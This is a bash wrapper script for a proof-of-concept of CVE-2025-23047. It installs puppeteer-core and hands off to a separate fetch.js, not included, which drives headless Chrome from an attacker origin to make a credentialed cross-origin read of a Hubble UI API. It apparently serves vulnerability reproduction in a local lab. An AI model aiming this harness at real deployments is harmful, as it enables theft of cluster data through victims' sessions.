#!/usr/bin/env bash
# CVE-2025-23047 PoC orchestrator.
# Drives a real headless Chrome (via puppeteer-core) from the attacker origin B
# to perform a credentialed cross-origin fetch against the Hubble UI API on
# origin A, and prints the JSON body the browser was allowed to read.
#
# Args:
#   $1 attacker origin (B)         e.g. http://127.0.0.1:8088
#   $2 api url on hubble origin(A) e.g. http://127.0.0.1:8081/api/cluster
#   $3 chrome executable path      e.g. "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
set -euo pipefail

ATTACKER_ORIGIN="${1:?attacker origin required}"
API_URL="${2:?api url required}"
CHROME_PATH="${3:?chrome path required}"

HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
cd "$HERE"

# Provision puppeteer-core locally (no Chromium download; we use system Chrome).
if [ ! -d "$HERE/node_modules/puppeteer-core" ]; then
  echo "[*] installing puppeteer-core..." >&2
  PUPPETEER_SKIP_DOWNLOAD=1 npm install --silent --no-fund --no-audit puppeteer-core@23 >&2
fi

exec node "$HERE/fetch.js" "$ATTACKER_ORIGIN" "$API_URL" "$CHROME_PATH"